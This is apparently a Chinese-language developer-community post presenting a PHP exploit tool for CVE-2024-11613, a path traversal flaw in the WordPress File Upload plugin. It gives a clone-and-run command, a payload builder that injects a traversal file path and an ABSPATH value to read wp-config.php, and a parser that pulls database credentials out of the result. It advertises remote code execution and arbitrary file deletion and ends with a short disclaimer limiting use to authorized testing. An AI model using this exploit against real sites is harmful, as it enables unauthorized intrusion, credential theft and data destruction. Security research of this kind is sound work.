WordPress文件上传插件漏洞利用工具(CVE-2024-11613)

原创

qife122

发布于 2026-03-04 23:55:03

1020

WordPress文件上传插件漏洞利用工具 (CVE-2024-11613)

项目概述

本项目是一个专门针对 WordPress File Upload 插件（版本 ≤ 4.24.15）中存在的 CVE-2024-11613 漏洞的概念验证（PoC）与利用工具。该漏洞允许未经身份验证的攻击者通过 wfu_file_downloader.php 文件中的路径遍历缺陷，实现远程代码执行、任意文件读取和任意文件删除等危险操作。本工具由安全研究员 Chirag Artani 开发，旨在帮助安全专业人员评估 WordPress 站点的安全性。

功能特性

🔓 远程代码执行 - 利用 JSON payload 构造绕过 sanitization 机制，在目标服务器上执行任意代码
📁 任意文件读取 - 突破目录限制，读取 WordPress 配置文件（wp-config.php）等敏感信息
🗑️ 任意文件删除 - 通过精心构造的请求，删除服务器上的任意文件
🛠️ 自动化利用 - 封装完整的攻击链，只需提供目标 URL 即可自动检测并利用漏洞
📊 详细输出 - 实时显示攻击过程中的 HTTP 交互和服务器响应
🔍 配置提取 - 自动解析数据库凭证、表前缀等关键配置信息

安装指南

系统要求

PHP 5.6 或更高版本（推荐 PHP 7.4+）
启用了 cURL 扩展
Web 服务器（如 XAMPP、WAMP、LAMP）或 CLI 环境

安装步骤

克隆代码库git clone https://github.com/3rag/wp-file-upload-exploit.git cd wp-file-upload-exploit
确保 PHP 环境配置正确php -v php -m | grep curl # 确认 cURL 扩展已启用
（可选）配置 Web 服务器 如果使用 XAMPP，将文件放入 htdocs 目录并通过浏览器访问。

使用说明

基础用法

通过命令行执行 PHP 脚本，指定目标 WordPress 站点的基础 URL：

php exploit.php http://target-wordpress-site.com

工作流程示例

初始化 - 工具构建插件 URL 并验证目标是否可达
构建恶意 payload - 生成包含路径遍历和 JSON 数据的恶意请求
发送请求 - 向 wfu_file_downloader.php 发送特制请求
解析响应 - 提取并显示目标服务器的 wp-config.php 内容

代码示例

<?php
// 创建漏洞利用实例
$exploit = new WFUExploit('http://example.com');
$payload = $exploit->createPayload('../../../../wp-config.php', '/var/www/html/');
$response = $exploit->sendExploit($payload);
echo $exploit->extractContent($response);
?>

典型使用场景

安全审计：在授权范围内检测 WordPress 站点是否存在此漏洞
渗透测试：验证目标能否通过文件读取获取数据库凭证
应急响应：快速评估补丁安装后是否仍有残余风险

核心代码

WFUExploit 类构造函数

class WFUExploit {
    private $plugin_url;
    private $wordpress_url;
    private $output = '';
    
    /**
     * 初始化漏洞利用对象
     * @param string $wordpress_url 目标 WordPress 站点的根 URL
     */
    public function __construct($wordpress_url) {
        $this->wordpress_url = rtrim($wordpress_url, '/');
        $this->plugin_url = $this->wordpress_url . '/wp-content/plugins/wp-file-upload/wfu_file_downloader.php';
    }
}

恶意 Payload 生成器

/**
 * 创建用于路径遍历的 JSON payload
 * @param string $target_file 要读取/删除的目标文件路径
 * @param string $abspath WordPress ABSPATH 变量（用于构造路径）
 * @return string 编码后的 JSON 字符串
 */
private function createPayload($target_file, $abspath) {
    return json_encode([
        'type' => 'normal',
        'ticket' => 'ABC123',  // 硬编码 ticket 值，插件未充分验证
        'filepath' => $target_file,  // 用户可控的文件路径
        'handler' => '',
        'expire' => time() + 3600,
        'wfu_ABSPATH' => $abspath,   // 注入的 ABSPATH 值，影响路径解析
        'wfu_browser_downloadfile_notexist' => 'File not found',
        'wfu_browser_downloadfile_failed' => 'Download failed'
    ], JSON_UNESCAPED_SLASHES);  // 保留斜杠以支持路径遍历
}

WordPress 配置解析器

/**
 * 从 wp-config.php 内容中提取数据库配置
 * @param string $content 配置文件内容
 * @return array 包含数据库名称、用户、密码、主机和表前缀的关联数组
 */
private function parseWPConfig($content) {
    $config = [];
    $patterns = [
        'DB_NAME' => "/define\(\s*'DB_NAME',\s*'([^']+)'\s*\)/",
        'DB_USER' => "/define\(\s*'DB_USER',\s*'([^']+)'\s*\)/",
        'DB_PASSWORD' => "/define\(\s*'DB_PASSWORD',\s*'([^']+)'\s*\)/",
        'DB_HOST' => "/define\(\s*'DB_HOST',\s*'([^']+)'\s*\)/",
        'TABLE_PREFIX' => "/\\\$table_prefix\s*=\s*'([^']+)'/"
    ];
    
    foreach ($patterns as $key => $pattern) {
        preg_match($pattern, $content, $matches);
        $config[$key] = isset($matches[1]) ? $matches[1] : 'Not found';
    }
    
    return $config;
}

HTTP 响应内容提取器

/**
 * 从 HTTP 响应中分离出主体内容
 * @param string $response 原始 HTTP 响应
 * @return string 剥离 HTTP 头后的响应体
 */
private function extractContent($response) {
    if (strpos($response, "\r\n\r\n") !== false) {
        list($headers, $body) = explode("\r\n\r\n", $response, 2);
        return $body;  // 返回不含 HTTP 头的纯文件内容
    }
    return $response;
}

安全注意事项

仅限授权测试：在未获得明确授权的情况下，使用此工具攻击他人网站是违法行为
风险自担：本工具仅用于教育和合法的安全评估，开发者不承担任何滥用责任
及时修复：如果发现系统存在此漏洞，请立即将 WordPress File Upload 插件升级至 4.24.15 以上版本FINISHED 6HFtX5dABrKlqXeO5PUv/+f9WgHAQo6EmA2xiG9JSe3aWtppVtH+ZtQChkxSvora

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

wordpress